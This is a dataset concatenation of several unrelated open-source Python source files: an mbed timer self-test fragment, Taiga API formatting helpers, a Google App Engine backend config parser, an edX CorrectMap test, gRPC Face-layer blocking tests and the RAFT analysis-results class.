c = selftest.mbed.serial_read(1)
if c is None:
return selftest.RESULT_IO_SERIAL
if c == '$': # target will printout TargetID e.g.: $$$$1040e649d5c09a09a3f6bc568adef61375c6
#Read additional 39 bytes of TargetID
if selftest.mbed.serial_read(39) is None:
return selftest.RESULT_IO_SERIAL
c = selftest.mbed.serial_read(1) # Re-read first 'tick'
if c is None:
return selftest.RESULT_IO_SERIAL
start_serial_pool = time()
start = time()
success_counter = 0
for i in range(0, self.TICK_LOOP_COUNTER):
c = selftest.mbed.serial_read(1)
if c is None:
return selftest.RESULT_IO_SERIAL
delta = time() - start
deviation = abs(delta - 1)
# Round values
delta = round(delta, 2)
deviation = round(deviation, 2)
# Check if time measurements are in given range
deviation_ok = True if delta > 0 and deviation <= self.DEVIATION else False
success_counter = success_counter+1 if deviation_ok else 0
msg = "OK" if deviation_ok else "FAIL"
selftest.notify("%s in %.2f sec (%.2f) [%s]"% (c, delta, deviation, msg))
start = time()
if success_counter >= self.TICK_LOOP_SUCCESSFUL_COUNTS:
break
measurement_time = time() - start_serial_pool
selftest.notify("Consecutive OK timer reads: %d"% success_counter)
selftest.notify("Completed in %.2f sec" % (measurement_time))
test_result = True if success_counter >= self.TICK_LOOP_SUCCESSFUL_COUNTS else False
return selftest.RESULT_SUCCESS if test_result else selftest.RESULT_FAILURE
|
apache-2.0
|
xdevelsistemas/taiga-back-community
|
taiga/base/api/utils/formatting.py
|
2
|
4697
|
# -*- coding: utf-8 -*-
# Copyright (C) 2014-2016 Andrey Antukh <[email protected]>
# Copyright (C) 2014-2016 Jesús Espino <[email protected]>
# Copyright (C) 2014-2016 David Barragán <[email protected]>
# Copyright (C) 2014-2016 Alejandro Alonso <[email protected]>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# The code is partially taken (and modified) from django rest framework
# that is licensed under the following terms:
#
# Copyright (c) 2011-2014, Tom Christie
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# Redistributions in binary form must reproduce the above copyright notice, this
# list of conditions and the following disclaimer in the documentation and/or
# other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
Utility functions to return a formatted name and description for a given view.
"""
from django.utils.html import escape
from django.utils.safestring import mark_safe
from taiga.base.api.settings import api_settings
from textwrap import dedent
import re
# Markdown is optional
try:
import markdown
def apply_markdown(text):
"""
Simple wrapper around :func:`markdown.markdown` to set the base level
of '#' style headers to <h2>.
"""
extensions = ["headerid(level=2)"]
safe_mode = False
md = markdown.Markdown(extensions=extensions, safe_mode=safe_mode)
return md.convert(text)
except ImportError:
apply_markdown = None
def remove_trailing_string(content, trailing):
"""
Strip trailing component `trailing` from `content` if it exists.
Used when generating names from view classes.
"""
if content.endswith(trailing) and content != trailing:
return content[:-len(trailing)]
return content
def dedent(content):
"""
Remove leading indent from a block of text.
Used when generating descriptions from docstrings.
Note that python's `textwrap.dedent` doesn't quite cut it,
as it fails to dedent multiline docstrings that include
unindented text on the initial line.
"""
whitespace_counts = [len(line) - len(line.lstrip(" "))
for line in content.splitlines()[1:] if line.lstrip()]
# unindent the content if needed
if whitespace_counts:
whitespace_pattern = "^" + (" " * min(whitespace_counts))
content = re.sub(re.compile(whitespace_pattern, re.MULTILINE), "", content)
return content.strip()
def camelcase_to_spaces(content):
"""
Translate 'CamelCaseNames' to 'Camel Case Names'.
Used when generating names from view classes.
"""
camelcase_boundry = "(((?<=[a-z])[A-Z])|([A-Z](?![A-Z]|$)))"
content = re.sub(camelcase_boundry, " \\1", content).strip()
return " ".join(content.split("_")).title()
def markup_description(description):
"""
Apply HTML markup to the given description.
"""
if apply_markdown:
description = apply_markdown(description)
else:
description = escape(description).replace("\n", "<br />")
return mark_safe(description)
|
agpl-3.0
|
wangyou/XX-Net
|
code/default/gae_proxy/server/lib/google/appengine/api/backendinfo.py
|
14
|
6551
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
A library for working with BackendInfoExternal records, describing backends
configured for an application. Supports loading the records from backend.yaml.
"""
import os
import yaml
from yaml import representer
if os.environ.get('APPENGINE_RUNTIME') == 'python27':
from google.appengine.api import validation
from google.appengine.api import yaml_builder
from google.appengine.api import yaml_listener
from google.appengine.api import yaml_object
else:
from google.appengine.api import validation
from google.appengine.api import yaml_builder
from google.appengine.api import yaml_listener
from google.appengine.api import yaml_object
NAME_REGEX = r'(?!-)[a-z\d\-]{1,100}'
FILE_REGEX = r'(?!\^).*(?!\$).{1,256}'
CLASS_REGEX = r'^[bB](1|2|4|8|4_1G)$'
OPTIONS_REGEX = r'^[a-z, ]*$'
STATE_REGEX = r'^(START|STOP|DISABLED)$'
BACKENDS = 'backends'
NAME = 'name'
CLASS = 'class'
INSTANCES = 'instances'
OPTIONS = 'options'
PUBLIC = 'public'
DYNAMIC = 'dynamic'
FAILFAST = 'failfast'
MAX_CONCURRENT_REQUESTS = 'max_concurrent_requests'
START = 'start'
VALID_OPTIONS = frozenset([PUBLIC, DYNAMIC, FAILFAST])
STATE = 'state'
class BadConfig(Exception):
"""An invalid configuration was provided."""
class ListWithoutSort(list):
def sort(self):
pass
class SortedDict(dict):
def __init__(self, keys, data):
super(SortedDict, self).__init__()
self.keys = keys
self.update(data)
def items(self):
result = ListWithoutSort()
for key in self.keys:
if type(self.get(key)) != type(None):
result.append((key, self.get(key)))
return result
representer.SafeRepresenter.add_representer(
SortedDict, representer.SafeRepresenter.represent_dict)
class BackendEntry(validation.Validated):
"""A backend entry describes a single backend."""
ATTRIBUTES = {
NAME: NAME_REGEX,
CLASS: validation.Optional(CLASS_REGEX),
INSTANCES: validation.Optional(validation.TYPE_INT),
MAX_CONCURRENT_REQUESTS: validation.Optional(validation.TYPE_INT),
OPTIONS: validation.Optional(OPTIONS_REGEX),
PUBLIC: validation.Optional(validation.TYPE_BOOL),
DYNAMIC: validation.Optional(validation.TYPE_BOOL),
FAILFAST: validation.Optional(validation.TYPE_BOOL),
START: validation.Optional(FILE_REGEX),
STATE: validation.Optional(STATE_REGEX),
}
def __init__(self, *args, **kwargs):
super(BackendEntry, self).__init__(*args, **kwargs)
self.Init()
def Init(self):
if self.public:
raise BadConfig("Illegal field: 'public'")
if self.dynamic:
raise BadConfig("Illegal field: 'dynamic'")
if self.failfast:
raise BadConfig("Illegal field: 'failfast'")
self.ParseOptions()
return self
def set_class(self, Class):
"""Setter for 'class', since an attribute reference is an error."""
self.Set(CLASS, Class)
def get_class(self):
"""Accessor for 'class', since an attribute reference is an error."""
return self.Get(CLASS)
def ToDict(self):
"""Returns a sorted dictionary representing the backend entry."""
self.ParseOptions().WriteOptions()
result = super(BackendEntry, self).ToDict()
return SortedDict([NAME,
CLASS,
INSTANCES,
START,
OPTIONS,
MAX_CONCURRENT_REQUESTS,
STATE],
result)
def ParseOptions(self):
"""Parses the 'options' field and sets appropriate fields."""
if self.options:
options = [option.strip() for option in self.options.split(',')]
else:
options = []
for option in options:
if option not in VALID_OPTIONS:
        raise BadConfig('Unrecognized option: %s' % option)
self.public = PUBLIC in options
self.dynamic = DYNAMIC in options
self.failfast = FAILFAST in options
return self
def WriteOptions(self):
"""Writes the 'options' field based on other settings."""
options = []
if self.public:
options.append('public')
if self.dynamic:
options.append('dynamic')
if self.failfast:
options.append('failfast')
if options:
self.options = ', '.join(options)
else:
self.options = None
return self
def LoadBackendEntry(backend_entry):
"""Parses a BackendEntry object from a string.
Args:
backend_entry: a backend entry, as a string
Returns:
A BackendEntry object.
"""
builder = yaml_object.ObjectBuilder(BackendEntry)
handler = yaml_builder.BuilderHandler(builder)
listener = yaml_listener.EventListener(handler)
listener.Parse(backend_entry)
entries = handler.GetResults()
if len(entries) < 1:
raise BadConfig('Empty backend configuration.')
if len(entries) > 1:
raise BadConfig('Multiple backend entries were found in configuration.')
return entries[0].Init()
class BackendInfoExternal(validation.Validated):
"""BackendInfoExternal describes all backend entries for an application."""
ATTRIBUTES = {
BACKENDS: validation.Optional(validation.Repeated(BackendEntry)),
}
def LoadBackendInfo(backend_info, open_fn=None):
"""Parses a BackendInfoExternal object from a string.
Args:
backend_info: a backends stanza (list of backends) as a string
open_fn: Function for opening files. Unused.
Returns:
A BackendInfoExternal object.
"""
builder = yaml_object.ObjectBuilder(BackendInfoExternal)
handler = yaml_builder.BuilderHandler(builder)
listener = yaml_listener.EventListener(handler)
listener.Parse(backend_info)
backend_info = handler.GetResults()
if len(backend_info) < 1:
return BackendInfoExternal(backends=[])
if len(backend_info) > 1:
raise BadConfig("Only one 'backends' clause is allowed.")
info = backend_info[0]
if not info.backends:
return BackendInfoExternal(backends=[])
for backend in info.backends:
backend.Init()
return info
|
bsd-2-clause
|
nttks/edx-platform
|
common/lib/capa/capa/tests/test_correctmap.py
|
107
|
7116
|
"""
Tests to verify that CorrectMap behaves correctly
"""
import unittest
from capa.correctmap import CorrectMap
import datetime
class CorrectMapTest(unittest.TestCase):
"""
Tests to verify that CorrectMap behaves correctly
"""
def setUp(self):
super(CorrectMapTest, self).setUp()
self.cmap = CorrectMap()
def test_set_input_properties(self):
# Set the correctmap properties for three inputs
self.cmap.set(
answer_id='1_2_1',
correctness='correct',
npoints=5,
msg='Test message',
hint='Test hint',
hintmode='always',
queuestate={
'key': 'secretstring',
'time': '20130228100026'
}
)
self.cmap.set(
answer_id='2_2_1',
correctness='incorrect',
npoints=None,
msg=None,
hint=None,
hintmode=None,
queuestate=None
)
self.cmap.set(
answer_id='3_2_1',
correctness='partially-correct',
npoints=3,
msg=None,
hint=None,
hintmode=None,
queuestate=None
)
# Assert that each input has the expected properties
self.assertTrue(self.cmap.is_correct('1_2_1'))
self.assertFalse(self.cmap.is_correct('2_2_1'))
self.assertTrue(self.cmap.is_correct('3_2_1'))
self.assertTrue(self.cmap.is_partially_correct('3_2_1'))
self.assertFalse(self.cmap.is_partially_correct('2_2_1'))
# Intentionally testing an item that's not in cmap.
self.assertFalse(self.cmap.is_partially_correct('9_2_1'))
self.assertEqual(self.cmap.get_correctness('1_2_1'), 'correct')
self.assertEqual(self.cmap.get_correctness('2_2_1'), 'incorrect')
self.assertEqual(self.cmap.get_correctness('3_2_1'), 'partially-correct')
self.assertEqual(self.cmap.get_npoints('1_2_1'), 5)
self.assertEqual(self.cmap.get_npoints('2_2_1'), 0)
self.assertEqual(self.cmap.get_npoints('3_2_1'), 3)
self.assertEqual(self.cmap.get_msg('1_2_1'), 'Test message')
self.assertEqual(self.cmap.get_msg('2_2_1'), None)
self.assertEqual(self.cmap.get_hint('1_2_1'), 'Test hint')
self.assertEqual(self.cmap.get_hint('2_2_1'), None)
self.assertEqual(self.cmap.get_hintmode('1_2_1'), 'always')
self.assertEqual(self.cmap.get_hintmode('2_2_1'), None)
self.assertTrue(self.cmap.is_queued('1_2_1'))
self.assertFalse(self.cmap.is_queued('2_2_1'))
self.assertEqual(self.cmap.get_queuetime_str('1_2_1'), '20130228100026')
self.assertEqual(self.cmap.get_queuetime_str('2_2_1'), None)
self.assertTrue(self.cmap.is_right_queuekey('1_2_1', 'secretstring'))
self.assertFalse(self.cmap.is_right_queuekey('1_2_1', 'invalidstr'))
self.assertFalse(self.cmap.is_right_queuekey('1_2_1', ''))
self.assertFalse(self.cmap.is_right_queuekey('1_2_1', None))
self.assertFalse(self.cmap.is_right_queuekey('2_2_1', 'secretstring'))
self.assertFalse(self.cmap.is_right_queuekey('2_2_1', 'invalidstr'))
self.assertFalse(self.cmap.is_right_queuekey('2_2_1', ''))
self.assertFalse(self.cmap.is_right_queuekey('2_2_1', None))
def test_get_npoints(self):
        # Set the correctmap properties for 7 inputs
        # 1) correct, 5.3 points
        # 2) correct, None points
        # 3) incorrect, 5 points
        # 4) incorrect, None points
        # 5) correct, 0 points
        # 6) partially correct, 2.5 points
        # 7) partially correct, None points
self.cmap.set(
answer_id='1_2_1',
correctness='correct',
npoints=5.3
)
self.cmap.set(
answer_id='2_2_1',
correctness='correct',
npoints=None
)
self.cmap.set(
answer_id='3_2_1',
correctness='incorrect',
npoints=5
)
self.cmap.set(
answer_id='4_2_1',
correctness='incorrect',
npoints=None
)
self.cmap.set(
answer_id='5_2_1',
correctness='correct',
npoints=0
)
self.cmap.set(
answer_id='6_2_1',
correctness='partially-correct',
npoints=2.5
)
self.cmap.set(
answer_id='7_2_1',
correctness='partially-correct',
npoints=None
)
# Assert that we get the expected points
# If points assigned --> npoints
# If no points assigned and correct --> 1 point
# If no points assigned and partially correct --> 1 point
# If no points assigned and incorrect --> 0 points
self.assertEqual(self.cmap.get_npoints('1_2_1'), 5.3)
self.assertEqual(self.cmap.get_npoints('2_2_1'), 1)
self.assertEqual(self.cmap.get_npoints('3_2_1'), 5)
self.assertEqual(self.cmap.get_npoints('4_2_1'), 0)
self.assertEqual(self.cmap.get_npoints('5_2_1'), 0)
self.assertEqual(self.cmap.get_npoints('6_2_1'), 2.5)
self.assertEqual(self.cmap.get_npoints('7_2_1'), 1)
def test_set_overall_message(self):
        # Default is an empty string
self.assertEqual(self.cmap.get_overall_message(), "")
# Set a message that applies to the whole question
self.cmap.set_overall_message("Test message")
# Retrieve the message
self.assertEqual(self.cmap.get_overall_message(), "Test message")
# Setting the message to None --> empty string
self.cmap.set_overall_message(None)
self.assertEqual(self.cmap.get_overall_message(), "")
def test_update_from_correctmap(self):
# Initialize a CorrectMap with some properties
self.cmap.set(
answer_id='1_2_1',
correctness='correct',
npoints=5,
msg='Test message',
hint='Test hint',
hintmode='always',
queuestate={
'key': 'secretstring',
'time': '20130228100026'
}
)
self.cmap.set_overall_message("Test message")
# Create a second cmap, then update it to have the same properties
# as the first cmap
other_cmap = CorrectMap()
other_cmap.update(self.cmap)
# Assert that it has all the same properties
self.assertEqual(
other_cmap.get_overall_message(),
self.cmap.get_overall_message()
)
self.assertEqual(
other_cmap.get_dict(),
self.cmap.get_dict()
)
def test_update_from_invalid(self):
# Should get an exception if we try to update() a CorrectMap
# with a non-CorrectMap value
invalid_list = [None, "string", 5, datetime.datetime.today()]
for invalid in invalid_list:
with self.assertRaises(Exception):
self.cmap.update(invalid)
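# ---------------------------------------------------------------------------
# Editor's note: a minimal, hedged usage sketch of the default scoring rule
# exercised by test_get_npoints above. It assumes the CorrectMap class already
# imported by this test module; the answer ids are illustrative only.
def _example_default_scoring():
    cmap = CorrectMap()
    cmap.set(answer_id='1_2_1', correctness='correct', npoints=None)
    cmap.set(answer_id='2_2_1', correctness='incorrect', npoints=None)
    # With no explicit points, correct answers default to 1 point and
    # incorrect answers to 0 points.
    assert cmap.get_npoints('1_2_1') == 1
    assert cmap.get_npoints('2_2_1') == 0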
|
agpl-3.0
|
fichter/grpc
|
src/python/grpcio_test/grpc_test/framework/interfaces/face/_blocking_invocation_inline_service.py
|
3
|
10601
|
# Copyright 2015, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Test code for the Face layer of RPC Framework."""
import abc
import unittest
# test_interfaces is referenced from specification in this module.
from grpc.framework.interfaces.face import face
from grpc_test.framework.common import test_constants
from grpc_test.framework.common import test_control
from grpc_test.framework.common import test_coverage
from grpc_test.framework.interfaces.face import _digest
from grpc_test.framework.interfaces.face import _stock_service
from grpc_test.framework.interfaces.face import test_interfaces # pylint: disable=unused-import
class TestCase(test_coverage.Coverage, unittest.TestCase):
"""A test of the Face layer of RPC Framework.
Concrete subclasses must have an "implementation" attribute of type
test_interfaces.Implementation and an "invoker_constructor" attribute of type
_invocation.InvokerConstructor.
"""
__metaclass__ = abc.ABCMeta
NAME = 'BlockingInvocationInlineServiceTest'
def setUp(self):
"""See unittest.TestCase.setUp for full specification.
Overriding implementations must call this implementation.
"""
self._control = test_control.PauseFailControl()
self._digest = _digest.digest(
_stock_service.STOCK_TEST_SERVICE, self._control, None)
generic_stub, dynamic_stubs, self._memo = self.implementation.instantiate(
self._digest.methods, self._digest.inline_method_implementations, None)
self._invoker = self.invoker_constructor.construct_invoker(
generic_stub, dynamic_stubs, self._digest.methods)
def tearDown(self):
"""See unittest.TestCase.tearDown for full specification.
Overriding implementations must call this implementation.
"""
self.implementation.destantiate(self._memo)
def testSuccessfulUnaryRequestUnaryResponse(self):
for (group, method), test_messages_sequence in (
self._digest.unary_unary_messages_sequences.iteritems()):
for test_messages in test_messages_sequence:
request = test_messages.request()
response = self._invoker.blocking(group, method)(
request, test_constants.LONG_TIMEOUT)
test_messages.verify(request, response, self)
def testSuccessfulUnaryRequestStreamResponse(self):
for (group, method), test_messages_sequence in (
self._digest.unary_stream_messages_sequences.iteritems()):
for test_messages in test_messages_sequence:
request = test_messages.request()
response_iterator = self._invoker.blocking(group, method)(
request, test_constants.LONG_TIMEOUT)
responses = list(response_iterator)
test_messages.verify(request, responses, self)
def testSuccessfulStreamRequestUnaryResponse(self):
for (group, method), test_messages_sequence in (
self._digest.stream_unary_messages_sequences.iteritems()):
for test_messages in test_messages_sequence:
requests = test_messages.requests()
response = self._invoker.blocking(group, method)(
iter(requests), test_constants.LONG_TIMEOUT)
test_messages.verify(requests, response, self)
def testSuccessfulStreamRequestStreamResponse(self):
for (group, method), test_messages_sequence in (
self._digest.stream_stream_messages_sequences.iteritems()):
for test_messages in test_messages_sequence:
requests = test_messages.requests()
response_iterator = self._invoker.blocking(group, method)(
iter(requests), test_constants.LONG_TIMEOUT)
responses = list(response_iterator)
test_messages.verify(requests, responses, self)
def testSequentialInvocations(self):
for (group, method), test_messages_sequence in (
self._digest.unary_unary_messages_sequences.iteritems()):
for test_messages in test_messages_sequence:
first_request = test_messages.request()
second_request = test_messages.request()
first_response = self._invoker.blocking(group, method)(
first_request, test_constants.LONG_TIMEOUT)
test_messages.verify(first_request, first_response, self)
second_response = self._invoker.blocking(group, method)(
second_request, test_constants.LONG_TIMEOUT)
test_messages.verify(second_request, second_response, self)
@unittest.skip('Parallel invocations impossible with blocking control flow!')
def testParallelInvocations(self):
raise NotImplementedError()
@unittest.skip('Parallel invocations impossible with blocking control flow!')
def testWaitingForSomeButNotAllParallelInvocations(self):
raise NotImplementedError()
@unittest.skip('Cancellation impossible with blocking control flow!')
def testCancelledUnaryRequestUnaryResponse(self):
raise NotImplementedError()
@unittest.skip('Cancellation impossible with blocking control flow!')
def testCancelledUnaryRequestStreamResponse(self):
raise NotImplementedError()
@unittest.skip('Cancellation impossible with blocking control flow!')
def testCancelledStreamRequestUnaryResponse(self):
raise NotImplementedError()
@unittest.skip('Cancellation impossible with blocking control flow!')
def testCancelledStreamRequestStreamResponse(self):
raise NotImplementedError()
def testExpiredUnaryRequestUnaryResponse(self):
for (group, method), test_messages_sequence in (
self._digest.unary_unary_messages_sequences.iteritems()):
for test_messages in test_messages_sequence:
request = test_messages.request()
with self._control.pause(), self.assertRaises(
face.ExpirationError):
self._invoker.blocking(group, method)(
request, test_constants.SHORT_TIMEOUT)
def testExpiredUnaryRequestStreamResponse(self):
for (group, method), test_messages_sequence in (
self._digest.unary_stream_messages_sequences.iteritems()):
for test_messages in test_messages_sequence:
request = test_messages.request()
with self._control.pause(), self.assertRaises(
face.ExpirationError):
response_iterator = self._invoker.blocking(group, method)(
request, test_constants.SHORT_TIMEOUT)
list(response_iterator)
def testExpiredStreamRequestUnaryResponse(self):
for (group, method), test_messages_sequence in (
self._digest.stream_unary_messages_sequences.iteritems()):
for test_messages in test_messages_sequence:
requests = test_messages.requests()
with self._control.pause(), self.assertRaises(
face.ExpirationError):
self._invoker.blocking(group, method)(
iter(requests), test_constants.SHORT_TIMEOUT)
def testExpiredStreamRequestStreamResponse(self):
for (group, method), test_messages_sequence in (
self._digest.stream_stream_messages_sequences.iteritems()):
for test_messages in test_messages_sequence:
requests = test_messages.requests()
with self._control.pause(), self.assertRaises(
face.ExpirationError):
response_iterator = self._invoker.blocking(group, method)(
iter(requests), test_constants.SHORT_TIMEOUT)
list(response_iterator)
def testFailedUnaryRequestUnaryResponse(self):
for (group, method), test_messages_sequence in (
self._digest.unary_unary_messages_sequences.iteritems()):
for test_messages in test_messages_sequence:
request = test_messages.request()
with self._control.fail(), self.assertRaises(face.RemoteError):
self._invoker.blocking(group, method)(
request, test_constants.LONG_TIMEOUT)
def testFailedUnaryRequestStreamResponse(self):
for (group, method), test_messages_sequence in (
self._digest.unary_stream_messages_sequences.iteritems()):
for test_messages in test_messages_sequence:
request = test_messages.request()
with self._control.fail(), self.assertRaises(face.RemoteError):
response_iterator = self._invoker.blocking(group, method)(
request, test_constants.LONG_TIMEOUT)
list(response_iterator)
def testFailedStreamRequestUnaryResponse(self):
for (group, method), test_messages_sequence in (
self._digest.stream_unary_messages_sequences.iteritems()):
for test_messages in test_messages_sequence:
requests = test_messages.requests()
with self._control.fail(), self.assertRaises(face.RemoteError):
self._invoker.blocking(group, method)(
iter(requests), test_constants.LONG_TIMEOUT)
def testFailedStreamRequestStreamResponse(self):
for (group, method), test_messages_sequence in (
self._digest.stream_stream_messages_sequences.iteritems()):
for test_messages in test_messages_sequence:
requests = test_messages.requests()
with self._control.fail(), self.assertRaises(face.RemoteError):
response_iterator = self._invoker.blocking(group, method)(
iter(requests), test_constants.LONG_TIMEOUT)
list(response_iterator)
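# ---------------------------------------------------------------------------
# Editor's note: a hedged sketch of how a concrete test class is expected to
# bind the two attributes named in the TestCase docstring. The implementation
# and invoker-constructor objects are placeholders supplied by the test
# harness elsewhere in grpc_test, not values defined in this module.
#
# class ExampleBlockingInvocationTest(TestCase):
#     implementation = my_test_interfaces_implementation    # assumption
#     invoker_constructor = my_invoker_constructor          # assumption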
|
bsd-3-clause
|
mfazliazran/raft
|
analysis/resultsclasses/AnalysisResults.py
|
11
|
6849
|
#
# Author: Justin Engler
#
# Copyright (c) 2011 RAFT Team
#
# This file is part of RAFT.
#
# RAFT is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# RAFT is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with RAFT. If not, see <http://www.gnu.org/licenses/>.
from .ResultSet import ResultSet
from .SingleResult import SingleResult
from PyQt4.QtGui import *
from PyQt4.QtCore import Qt
class AnalysisResults(object):
"""Contains all results found for a given analysis."""
def __init__(self , resultfactory=None):
"""Results that span across multiple pages"""
self.overall={}
"""Results that apply to a single page"""
self.pages={}
"""pages scanned with no results"""
self.nofindings={}
"""counts of total results within each grouping"""
self.resultcounts={'Overall':0,'Page':0,'No':0}
self.desc=None
self.friendlyname=None
self.analyzerclass=None
self.resultfactory=resultfactory
#############################Standard Functions
#############################Functions often used when writing an analyzer
def addPageResult(self, pageid, url, type, desc, data, span=None, severity=None, certainty=None, highlightdata=None):
"""Adds a new per-page standard result to the given pageid for this analysis"""
self.addCustomPageResult(pageid,
SingleResult(type, desc, data, span, severity, certainty, highlightdata=highlightdata),url)
def addOverallResult(self, type, desc, data, span=None, severity=None, certainty=None, context=None, highlightdata=None):
"""Adds a new overall result to this analysis"""
self.addCustomOverallResult(SingleResult(type, desc, data, span, severity, certainty, highlightdata=highlightdata),context)
#############################Special Functions
#############################You shouldn't need to call these unless you're doing something crazy.
def addCustomPageResult(self,pageid,result,url):
if pageid not in self.pages:
self.pages[pageid]=ResultSet(pageid,False,url)
self.pages[pageid].addResult(result)
def addCustomOverallResult(self,result,context):
"""Adds an arbitrary result object to the overall results."""
if context not in self.overall:
self.overall[context]=ResultSet(None,True,context)
self.overall[context].addResult(result)
def setAnalyzerInfo(self, newdesc,newfriendlyname, newanalyzerclass):
self.desc=newdesc
self.friendlyname=newfriendlyname
self.analyzerclass=newanalyzerclass
def toHTML(self):
"""returns an HTML representation of the entire analysis"""
finaloutput=self.generalInfoToHTML()
if len(self.overall) > 0:
finaloutput+='<h2>Overall Results</h2>'
for k in list(self.overall.keys()):
finaloutput+=self.overall[k].toHTML()
if len(self.pages)>0:
finaloutput+='<h2>Results for each page analyzed</h2>'
for k in list(self.pages.keys()):
finaloutput+=self.pages[k].toHTML()
return finaloutput
def generalInfoToHTML(self):
"""Returns an HTML 'header' string describing the test performed"""
outstring="""<h1>%s</h1>
<p>(%s)</p>
<p>%s</p>
"""%(self.friendlyname,self.analyzerclass,self.desc)
return outstring
def generateTreeItem(self,parentnode):
tempitem=QTreeWidgetItem(parentnode)
tempitem.setText(0,str(self.friendlyname))
tempitem.setText(1,"".join((str(self.numresults),' results')))
tempitem.setFlags(Qt.ItemIsEnabled|Qt.ItemIsSelectable)
tempitem.customdata=self
return tempitem
def generateTreeChildren(self,db,cursor,parentnode):
if self.resultfactory is not None:
factoryitems=self.resultfactory.createItems(self, self.instanceid,db,cursor)
self.resultcounts, self.overall, self.pages, self.nofindings = factoryitems
else:
#If this tree item came from the db, and we haven't populated it yet, populate it.
if self.dbgenerated and not self.dbretrieved:
resultsets=db.analysis_get_resultsets_per_instance(cursor,self.instanceid)
for resultset in resultsets:
numresults=resultset[5]
if resultset[2]:
store=self.overall
storekey=resultset[3]
self.resultcounts['Overall']+=numresults
tempRS=ResultSet(storekey,None,True)
elif numresults>0:
store=self.pages
storekey=resultset[1]
self.resultcounts['Page']+=numresults
tempRS=ResultSet(resultset[3],storekey,False)
else:
store=self.nofindings
storekey=resultset[1]
tempRS=ResultSet(resultset[3],storekey,False)
tempRS.dbgenerated=True
tempRS.dbretrieved=False
tempRS.resultsetid=resultset[0]
tempRS.numresults=resultset[5]
store[storekey]=tempRS
self.dbretrieved=True
#Now that the tree is populated, make the nodes
childnodes=list()
for name,store in (('Overall',self.overall),('Page',self.pages), ('No',self.nofindings)):
storelen=len(store)
if storelen>0:
tempitem=QTreeWidgetItem(parentnode)
tempitem.setText(0,'%s Results'%name)
tempitem.setText(1,'%s results in %s set%s'%(self.resultcounts[name],str(storelen),'s' if storelen>1 else ''))
tempitem.setFlags(Qt.ItemIsEnabled|Qt.ItemIsSelectable)
childnodes.append(tempitem)
for k in store:
store[k].generateTreeItem(tempitem)
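# ---------------------------------------------------------------------------
# Editor's note: a hedged usage sketch showing how an analyzer might record
# findings with this class and render them. All argument values below are
# illustrative assumptions, not part of the RAFT API contract.
def _example_usage():
    results = AnalysisResults()
    results.setAnalyzerInfo('Checks example pages for sample findings',
                            'Example Analyzer', 'ExampleAnalyzer')
    results.addOverallResult('Info', 'Example overall finding', 'finding data')
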